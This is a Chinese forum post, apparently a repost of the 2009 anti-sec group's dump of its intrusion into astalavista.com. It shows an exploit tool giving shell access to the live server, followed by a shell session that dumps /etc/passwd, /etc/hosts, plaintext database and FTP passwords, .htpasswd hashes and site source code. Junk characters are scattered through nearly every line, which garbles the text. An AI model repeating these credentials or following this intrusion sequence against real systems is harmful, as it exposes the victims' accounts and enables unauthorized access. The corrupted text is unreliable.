里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
8 N: c; S# i' @& A' Z
f# f0 W' @1 q4 c: I& R% R, _9 A[root@front3 ~]# curl -I litespeedtech.com
3 q& D$ H h( ]HTTP/1.1 200 OK
$ M6 h( R! x9 O) V6 Y, ^( ?Date: Fri, 05 Jun 2009 22:54:51 GMT' S9 c' \/ Y' G- i& v
Server: LiteSpeed
& e# y4 O+ L% a+ S% G
/ Z0 C# _3 ^4 l, h7 j另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-" R6 ?6 y* j) C$ Z, B3 ^. F0 h
6 E( m) H' k9 z$ I/ }! U$ \2 B有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
9 |9 G6 k" L" {: d6 S Y* I) `% b, C7 @( e
- g# q3 m/ W( _' C; I/ o
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ - g- N& Y( h4 D8 [
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
' @3 N; Y# r9 ^1 ~5 r/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
5 h$ K6 n% U% U* P/ {\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
; Y$ }( u" l- N7 u8 Y% p9 D, c \/ \/ \/ \/ \/ \/ \/6 c" M& I; |- Y2 D# B* I3 L
The Hacking & Security Community
" _0 U+ w$ K6 e. a1 g( u0 n# K[+] Founded in 1997 by a hacker computer enthusiast
" R/ X1 z3 ]: T, \" W[-] Exposed in 2009 by anti-sec group
3 L9 Q; l7 D$ C1 J* b3 f- ^ E2 w: D
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:+ ~( Z& A1 P+ o7 S( ~( h; l
>> 03. Who’s behind the site?) a9 t. a$ x3 n8 q* O4 C$ X
>>% l! I3 [: o' V! o# u
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
4 W7 I! i- l! c7 k& ~1 T2 W; N( _' c6 ^' A3 p/ ]
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?) L7 r4 j" e; A
>>( V- R1 o9 I/ K- i
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
`4 a4 g# [3 S' \( A- I. k; R% omilitary institutions.
8 ]' N& Y0 U- |1 N>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
( `5 t6 m0 e# O) _6 z# Y* {* `& Z9 x
$ v( F6 u0 Q7 R! BWhy has Astalavista been targeted?# }+ q) o0 S# a$ _& g( m
6 f# G; c; t, t9 x5 t) H# zOther than the fact that they are not doing any of this for the “community” but
7 i* U) g6 }6 z O5 ]for the money, they spread exploits for kids, claim to be a security community
5 W5 p! v9 h4 U/ @ W) ^$ L# ~(with no real sense of security on their own servers), and they charge you $6.66! G. k; k5 y- `. ]
per months to access a dead forum with a directory filled with public releases
+ g" B# U" E- D! H( d3 |and outdated / broken services.
, b2 X+ c4 v* X' M& H
$ ?3 b; q+ G' v' ?: c% [We wanted to see how good that “team of security and IT professionals” really is.* j. L1 ]5 L- d3 {+ w
* x T. k' c* K3 k, Y+ pLet’s begin.
$ j# e/ r9 M5 M: }
* R! D. I2 h) w, e" R5 danti-sec:~# ./g0tshell astalavista.com -p 807 n8 D- \& Q5 P! B2 G% h) j6 C
[+] Connecting to astalavista.com:803 x t* Z( z. ?- i
[+] Grabbing banner…
' P; [3 w* M( \LiteSpeed& V' _, x0 e- v! e3 _0 ^+ t1 Z, O
[+] Injecting shellcode…
; T/ s7 K& a U, u) Z& }[-] Wait for it
+ N8 u- O- o) D) n+ q
# N( W0 A9 f: f: M0 h[~] We g0tshell
8 ?% l, v8 k/ V5 g8 ^4 b. _& D& F! Guname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux; \4 D6 t Q, k2 v7 Y
ID: uid=100(apache) gid=500(apache) groups=500(apache)
5 B5 R& b, Z$ e+ t! O) y
3 Y- _% B& ~5 O: ush-3.2$ cat /etc/passwd
4 O7 s7 p* Q/ q n0 ?* t. e5 S( Mroot:x:0:0:root:/root:/bin/bash6 @6 [- j: u k( x
bin:x:1:1:bin:/bin:/sbin/nologin
2 H5 d0 f S. w! `/ y4 |! gdaemon:x:2:2:daemon:/sbin:/sbin/nologin
0 i7 i/ ~8 {( P& O, @" qadm:x:3:4:adm:/var/adm:/sbin/nologin
: F+ g4 s# ?% l0 J& l3 Tlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin$ x1 n9 d+ F9 m' x3 P8 C
sync:x:5:0:sync:/sbin:/bin/sync
0 |9 M. k! Y ^' \+ o/ o3 Qshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
; n$ K" ^. Z/ rhalt:x:7:0:halt:/sbin:/sbin/halt
. a0 x3 h7 \' q% b5 W+ e! \7 zmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
( J% e r2 K: d; Qnews:x:9:13:news:/etc/news:
- |, `: i0 C/ k# a5 K, @uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
: l% Z) K. G7 T+ _. [' k, e, ]operator:x:11:0perator:/root:/sbin/nologin
% K5 X1 e2 |! m/ r: p! \6 B8 w6 P6 Pgames:x:12:100:games:/usr/games:/sbin/nologin( ^. F3 X: ^7 \2 I
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
9 X. D) ~7 j1 tftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
; ~2 R8 B4 |- Mnobody:x:99:99:Nobody:/:/sbin/nologin- }3 U! Y# ~# U! r7 F, p
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
* z1 i) w6 j5 z: B6 d% Z4 p% hdbus:x:81:81:System message bus:/:/sbin/nologin
3 R: `8 o. f w& E9 g7 E& unscd:x:28:28:NSCD Daemon:/:/sbin/nologin
; p# |2 K2 l7 \! |3 E ]5 n; W: \mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin, t0 g% k( H* V. s
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
% c/ E2 X5 Y/ uvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin' D' C' ^7 D5 n6 \2 {
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
% p' r j& l) h1 Erpc:x:32:32ortmapper RPC user:/:/sbin/nologin
5 z7 A/ t# c0 W' Q \+ y" Frpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin* X# S$ y9 q- n7 k
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
^% X z2 H/ C, Lsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin; z F0 c* W! z1 o+ e0 M
pcap:x:77:77::/var/arpwatch:/sbin/nologin7 }; c5 C8 o; I" [% Y
named:x:25:25:Named:/var/named:/sbin/nologin% b" W. n* ^' j/ e* s% v8 q
apache:x:100:500::/var/www:/bin/false
& O1 n+ y9 Z2 x6 }diradmin:x:101:101::/usr/local/directadmin:/bin/bash( ?# F4 u4 V9 g
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
& O$ t) X# f2 R( l0 `- z3 E' j- wwebapps:x:500:501::/var/www/html:/bin/bash
" j3 F) C7 L& B9 Pmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash6 w' S$ u- `3 _) I/ D
admin:x:501:502::/home/admin:/bin/bash& O/ p) U, d' @
jon:x:502:503::/home/jon:/bin/bash% a# L, s O. c1 ?3 U2 H4 k1 p j3 \: e
com:x:503:504::/home/com:/bin/bash) f( I) R5 i9 [" h
ntp:x:38:38::/etc/ntp:/sbin/nologin' Y/ S2 S' P5 b' t+ E# |4 X
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
; m L9 L) p* k$ Gastanet:x:504:505::/home/astanet:/bin/bash
4 ?$ }- [. U2 J8 c1 D8 _avahi:x:70:70:Avahi daemon:/:/sbin/nologin) g2 y* Y. `8 d# U8 Y: K
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin" A8 ]) m& G- o! r
) ]" K0 J4 e5 L- c$ r2 H+ Tsh-3.2$ cat /etc/hosts
# r6 C, M, W8 C& w9 g# Do not remove the following line, or various programs3 Y" c: A9 Q X0 t" W% [
# that require network functionality will fail.( U3 U- m1 z. _& ~
127.0.0.1 localhost.localdomain localhost' E$ s' h' M! L
::1 localhost6.localdomain6 localhost6
3 |4 m2 K4 a R$ K2 K# F* l5 c80.74.154.172 asta1.astalavistaserver.com
# M) k8 ^) b6 S7 D, ~7 Z- C: p
7 f7 a( s: F, F& z) Ush-3.2$ pwd# v, Z. P1 O4 h: z
/home/com/public_html: `: b, c" R7 p% X6 n
x1 }- o3 O: I% Z+ n9 u6 }' A% d
sh-3.2$ ls -la
: U3 e9 k' P7 ]+ ~- S- t' }7 ztotal 184601 T6 e1 a' L$ h$ U+ J% m
drwxr-xr-x 30 com apache 4096 May 28 17:06 .2 u, n3 y* I) k3 q
drwx–x–x 11 com com 4096 Jun 25 2008 ..- N! Y; h3 j' a- W% [
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin* D9 C# t2 Q. D/ ~0 V. y
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache3 f: x5 |$ i, ^/ p
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
, |# q1 T% `0 W( X" a* `drwxrwxrwx 2 com com 4096 May 19 00:50 config
4 |, v _, N. M+ O, Mdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core9 x+ v& m0 X7 K/ Z# U: G
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules6 W0 |" Q/ u: A. a( h, z* M
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
, m0 C3 u+ `4 m' T' vdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo# r* z: v4 q/ e" L X
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__. y% T, [( C# f" M. t$ ?6 J
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php, H4 D7 ]1 C) X6 Y! A
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
+ A) L: b* k/ f/ @3 ^& Edrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor/ N% q3 O5 I! D- `4 J
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
+ e, A$ X* [ `) m% d3 g$ K& c7 |drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
9 U4 e. W$ `) k3 n# d# G-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess7 g! s( z9 Q( f3 s6 ]! ~# Y1 ?
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
0 G4 l: q" C4 n; M( O% G4 F* C5 v-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
2 r9 d8 N7 {- Q' `+ Y3 b) ~1 @drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
6 d& R$ k* _& E6 d O( m {1 ^; adrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
! q6 O. |* ?, \. z1 a-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php3 V* j$ _, M5 R
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
$ t9 ~! e( P' N+ q1 ndrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
( d. g, W9 V- r9 Rdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib+ e- w0 t9 ?+ U: p4 |
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
$ J4 M& v/ A' G4 n, c1 w8 i9 Ddrwxr-xr-x 8 com com 4096 May 11 12:48 modifications1 K/ A! u" J ~: J/ n$ L
drwxr-xr-x 34 com com 4096 May 28 16:30 modules4 f8 L+ q2 Z0 G% Y( o$ O3 t
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
/ z, s" j1 t3 j( l, i7 j1 Adrwxrwxr-x 22 com com 4096 May 28 17:06 _new
5 E% d1 R4 Y- w8 f! }( [4 zdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
- g3 p( a3 y& d' Qdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy+ x+ Q, d: A# U
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
9 @ H2 M9 `% o-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt* L! ?; {" z5 w. a8 b5 p7 R2 p+ @
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml, ~- ~- N, U( z% E
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php6 a' A8 Q- R" `
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes2 M8 S7 p* S" |) u8 }
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
8 d4 ?% w2 T* H: x1 _5 ?' Q4 `drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
2 M* k5 l8 n; w+ d9 V' p0 s4 w0 G, [) U1 h2 U4 N9 R
sh-3.2$ head -20 index.php3 k$ o& O4 {. `" I. U4 _
<?php
- }# A! J5 }6 u/ X+ f/ i: V
2 u" \2 [2 x2 p/**) V2 U' i7 _9 A! L2 \" L
* The main page for the CMS- j% l* v. b4 u/ v9 w& p d2 l
* @copyright CONTREXX CMS - COMVATION AG
2 g( j' X C/ y0 p* @author Comvation Development Team
3 `, l2 u Y- c. V" P8 C* @version v1.0.9.10.1 stable
1 [+ D) [9 q% a7 K* L) k( w* @package contrexx
0 u8 R# C5 p1 X' ?% l4 j- h( y* @subpackage core6 f$ P7 B! q; T& g; q4 O
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage( H8 x l) @9 ~2 a: [4 g* e4 o2 o
* @since v0.0.0.0, @6 m8 L4 V; c5 Z% d' |: v- H
* @todo Capitalize all class names in project
4 V+ S' f6 ^4 Q9 \" n6 M* @uses /config/configuration.php
% N! s Q. F% J3 R2 ?" v( b* @uses /config/settings.php
+ S3 N: W: ~9 M+ t( I* X* @uses /config/version.php1 T8 V) {0 h' X& F3 S
* @uses /core/API.php8 z9 l6 _" d! i, e3 {# h" Q
* @uses /core_modules/cache/index.class.php3 G6 W ?! Y/ C# y( J
* @uses /core/error.class.php
! C. G) Z0 X/ i6 H2 ^: j) m3 j* @uses /core_modules/banner/index.class.php
# N* D0 @1 z& q! g6 x8 E8 J0 }- z* @uses /core_modules/contact/index.class.php
, D7 G+ W# J& z( e# D( }( j2 Q% a7 C* O6 g
sh-3.2$ cd config/
3 M3 N7 s4 Z6 m# [( }5 `sh-3.2$ ls -la
/ R; V$ P4 Y: etotal 32
- O* B1 {* V" b: z' d5 f" g0 ydrwxrwxrwx 2 com com 4096 May 19 00:50 .: G9 v7 h2 w; o7 S# }% U. i
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
/ t9 O6 E# L1 y; H-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php0 ?) w3 n, t$ a
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
0 n: q& H w6 y" k5 C-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
! _* C4 F$ K# c-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php \4 t3 o3 R$ N* V2 |" ~
0 s A% K+ w; p* c/ Z6 J$ k7 o
sh-3.2$ cat configuration.php
/ A' W/ U# Z& c( M% W; V( t% \[snip]! w* N" o- k2 S. ^) r) T
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost0 ]# ~0 X H5 L5 h2 n/ J
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name: H" g' w" d; Q: q: u8 v n
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix( j4 b1 i8 w& o
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
( }5 j( z. s. {0 C1 T2 [$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
1 g7 o9 \# t) }8 o$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
2 o1 C# m' p q1 I$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)" c6 t+ C( v" A* ~; O
[snip]; r( ]6 L. n) w% x6 T
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
8 H E) m! J4 T" ~9 U5 z$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
9 Z" {1 H3 _: l( k2 C$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost% f! w4 M }8 Y. I, T$ }* n, a
$_FTPCONFIG['port'] = 21; // Ftp remote port) ?# [- p1 h# @& @9 O( L# l* S
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
$ c" I z4 C; J" n* ?$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
' N6 b, M. d. w+ y' |6 m$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms( ~2 G o2 b7 F' ?- h8 b
9 z$ l) N2 C0 O
sh-3.2$ cd ..# y( j! I$ r. Z6 r$ l/ v+ f+ U
sh-3.2$ cd dvd/
* k, e9 {- K" O+ Y7 I% Vsh-3.2$ ls -la
7 G& s' ]; v) G2 K1 h6 Itotal 29137808 O* ]% U" J; t2 O4 g
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
7 k: D ~3 l5 l! w; m7 Hdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
6 t4 W) Y- _2 w1 p5 j& [! _-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
) ]+ ?' ]' @! P% A-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
# R7 w& ^3 z# N# B) B-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
" |* c! J: T7 y) h/ F' K9 ^-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
0 o$ n# M- N% U" o# Y! r, s& Q; H3 n* P% z+ _6 ~3 }
sh-3.2$ cat .htaccess) \/ v" G6 Z$ J, b
authType Basic
- N1 O2 `8 H# zauthName DVD
- x, f% ^5 W7 d+ h, SauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
5 X2 |! d; o8 _$ T$ c8 Rrequire valid-user" y! O- P" W5 A' ~/ v5 h) u
9 l+ `/ J! S& g
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd. Q" B) a3 n' t9 v
DVDdownload:CRD8cuY6.MPT6
9 Z# X, |- F2 ~DVDdownload2:CR8a36.wluFMg( C* R6 C9 v' g' B) Q
8 p( O$ Q1 ?0 d' U/ f1 A6 b4 ?
sh-3.2$ cat test.php
3 r1 V# J( K9 o( c% W6 K) d5 }<?php+ O$ q9 [/ D7 y* H/ f, V+ n* ]2 i
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
1 j Q( W$ c* \( ~* k$ ~$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));7 {4 [$ ^6 o$ `5 W! z2 w$ e
echo $url;4 W" n' m0 m4 K2 m5 H
?>
6 r% @; B3 J' h3 }, P- d4 h% v: o6 M' N8 _7 r
sh-3.2$ cd modifications/8 P) @+ m- |% D# g- F& Z, S
sh-3.2$ ls -la' ^* g: w% }, ^% b6 c) l b/ N
total 32: @: Q( k, b! N9 m+ I
drwxr-xr-x 8 com com 4096 May 11 12:48 .
8 ^0 Y7 K/ [" G- Edrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
7 z* e$ b g% c2 G, M* A4 [5 Qdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng9 K! m! I5 X( }9 S" J. Q
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs7 K1 |" H+ M- ~5 ~7 [% m/ X
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools; v5 u, k: a I
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc4 Q' b5 U9 A, h, ?+ G. R7 D$ o
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
6 C3 _4 H% _9 g8 a- T0 {! {3 F3 |drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp8 R% Q V# z4 _: T
6 L8 C ?) A7 {; x! u Q6 j( zsh-3.2$ ls -R) s) v4 m3 V. p. q/ b, J
.:+ h* ~3 P7 i: \- J1 p
com_avtng cronjobs onlinetools pjirc search _tmp) `* `2 X8 u( o2 O
0 H* d4 {1 c C$ C* X" t" n! p2 x
./com_avtng:
; c: _: T5 b0 Uavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
! z! u: d/ C' f0 [5 r1 i- V. F3 u0 p' K* Z# k
./com_avtng/scripts:4 V# L$ Q$ \9 t( b/ h
popunder.js
# b% t( H* D* p7 j2 L! v6 L/ R# M
8 v9 T+ @6 A' x/ U: N2 e, l+ N( |./cronjobs:, b) E& i' p: Q
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
( H2 n- g# J5 Z/ @5 Z4 f8 _2 g& E [, q4 \+ N( U5 F$ P
./cronjobs/tmp:- Y1 c; V! u2 K( A" o! t* Y
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv2 X, d7 f) |" { {- e4 [& K( q
\) X2 H+ ?, T6 X. D./onlinetools:
! p& G6 }' b# H% @ |/ {( uindex.php
* D4 d8 I4 i7 c. {
. i7 s- ^, b) U: C4 j3 B./pjirc:
- C6 e. `' ~5 Y+ O0 t/ a9 Ja_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
$ K4 i( R K! o9 \; M( |AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
0 j* W* }$ W7 W Hbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
% w0 A9 A; N3 o' B5 r( m, ~$ {
5 L, w/ G( M2 m. {( ]./pjirc/img:. C. q% @$ A" F+ Y
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif3 Z! R" }; Y) i/ H3 k
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif : q, \2 `' I, I% Z- Y% O
verre-eau.gif9 J" ]$ M' ~5 g& T3 v( q
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif $ ]; ]+ K8 g* X( Z7 R0 }2 C
verre-vin.gif/ R" p% F3 b# R3 I
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif% V7 e+ q- L1 n9 V( [
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif- h: |: A9 c7 Z. _
U0 l' y; P5 q$ r6 [: h: R
./pjirc/snd:: l( ?+ Y( t9 Y
bell2.au ding.au* @ U( E4 B, O, v& O
. U3 u% H7 O: o5 e: Y# F
./search:
1 V7 l+ d( b, y* ^: M9 ]. x( ?searchEngines.php search.php
3 H& h# r5 d; |2 J5 h9 r* V# x( b; m8 }! m) c% L& h$ E! X
./_tmp:
a3 d4 {1 _7 n- s3 W3 x" TdefaultPorts.php defaultPorts.txt
9 V7 v* ~+ \7 S- T' j* p/ A& I8 d/ o" ], ?
, z$ H. g u3 h/ ?* y' U2 Msh-3.2$ cd cronjobs/# c# M' Z& [1 z7 n8 p$ \
sh-3.2$ cat exploits.php$ c9 l3 D& d) t$ L
[snip]4 `- i" M2 @( k" m# X
$categories = array();
1 M3 |% L5 X* M2 a3 l V$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;) p! I6 ~( D, k4 {- ^
$expolits = file($milw0rmFile);2 `* g0 [: s+ W6 J- V; J
$comExploits = array();$ \3 T6 i3 Q% N9 n6 I8 A5 j
[snip]
6 f* i. `. _1 p$ L// manage data
) j3 d/ E+ f) z# [6 i2 d( Hfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640" V2 s- B. L6 E1 }0 J+ _
0 n8 n! f' T& m) c // get path and title
6 O# @# [! R8 X% E $expolits[$x] = trim($expolits[$x]);
L @' A! Y, |: d. v) a9 U8 { $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
, B( w! Z- r) P& p9 X- \2 R k# u $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);& Y7 z' m6 p( y: G* b+ a; @
( b9 |. ?4 z% U4 l$ _( k
// check if file exists
) t: `! q: U2 S! { if (file_exists($path)) {" e: [0 M$ k% {
7 l: b8 G8 T: ]3 t
$text = file_get_contents($path);8 X7 _! ?$ W. j) s
; m0 A# E/ g$ Y& f" z# W/ A$ R( r // get content and date
( m/ a1 ^) l" t+ _: g& H5 f1 C //$text = htmlspecialchars($text, ENT_QUOTES);. T! u( Q: A/ Z. J- N
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));) O. X) C% R. [" e6 X6 N a; ~& K
if ($tmptext != ”) {0 o- V: j: a$ J
$text = $tmptext;
/ E y$ t5 e9 @5 [; ~ } else {
% U+ q" y# |$ H7 M $text = addslashes(htmlentities($text, ENT_QUOTES));
, v. X& t, S' J# x Y, d/ x }
) p \7 t2 z7 M% U& n $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));7 ~" I2 ~7 ^: H' Y+ g( e
$tmp = explode('-', $date);
1 \! L0 Z0 }" d0 S$ B# H $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));) F# _# W: @! I$ R
$cat = getCategory ($path);
7 k) @" l6 Q5 l# D $ext = pathinfo(basename($path));
k3 m4 z# H1 K* S $ext = $ext['extension'];: [+ n% P1 W$ _6 L I5 p: V
$qStr = ”
8 [/ _& B# v; m+ ?) G SELECT `id`2 B7 @: X" G) e! T& Y3 [: @2 Y
FROM `contrexx_module_exploits`4 L) f `) U; x: H2 m
WHERE `title` = ‘” . $title . “‘" f0 p- u2 J( J. j
AND `date` = ‘” . $date . “‘
$ J1 m$ N8 }& {/ H& f% |, {3 I( ^ “;, b4 s4 Y3 e8 _4 [' V
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
% F, `9 f' l1 s* j1 L $q = $_objDB->query($qStr);
5 _( ^: z9 j; x; e; K6 b
' c# q: f! C- ^) A; [/ F, u! V if ($q->numRows() == 0) {
# y& {; s. t$ L: ?$ [
+ [0 f# [! f8 c- c$ G/ E // prepare array
6 }# u0 [$ X7 g% q3 g9 h+ M $comExploits[$x]['date'] = $date;/ y# U2 @1 A w% d
$comExploits[$x]['title'] = $title;
. `* q$ z. z, f% g; E# a $comExploits[$x]['author'] = ‘milw0rm’;* ~) x0 y8 N* T- J9 K% \7 V
$comExploits[$x]['text'] = $text;
' X: p4 T4 H/ x7 |( u $comExploits[$x]['source'] = $ext;$ Q' @2 u( M4 S4 y$ N
$comExploits[$x]['url1'] = ”;
. {' X; I* g6 b5 k $comExploits[$x]['url2'] = ”;& e" o2 B" H& x. u
$comExploits[$x]['catid'] = $cat;
; ?; X' E- M* `; s1 | $comExploits[$x]['lang'] = ‘2′;
* `+ R7 ?0 }' Z( O* J! }, G $comExploits[$x]['userid'] = ‘12′;- O+ @* @, Y- w" [+ }; H
$comExploits[$x]['startdate'] = ‘0000-00-00′;
. T# k2 d! ~" m/ i5 V, x0 V6 G $comExploits[$x]['enddate'] = ‘0000-00-00′;9 t% Y' [5 X0 R- Q7 k
$comExploits[$x]['status'] = ‘1′;% F$ a! N, t$ i$ x
$comExploits[$x]['changelog'] = $date;. k* D" x1 u- i) e% ~1 `, D% s6 v
5 |. l% o9 v, ]. C; F1 p }
4 n$ U# o0 i8 R( C[snip]
L& f# d8 L7 A. `) L& N& V $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
9 e6 A% S6 D8 a y) f, d<rss version=”2.0″>* O! X3 b% \% |0 f( `& t; t) ]
<channel>
- W) V& x" g- w% f& H" Z <title>ASTALAVISTA.com - Exploits</title>
9 M" J3 M) V7 ]4 L+ ?" x8 y8 x <link>http://www.astalavista.com/exploits</link> ]1 h2 t/ a7 A
<description>All availably Exploits.</description>
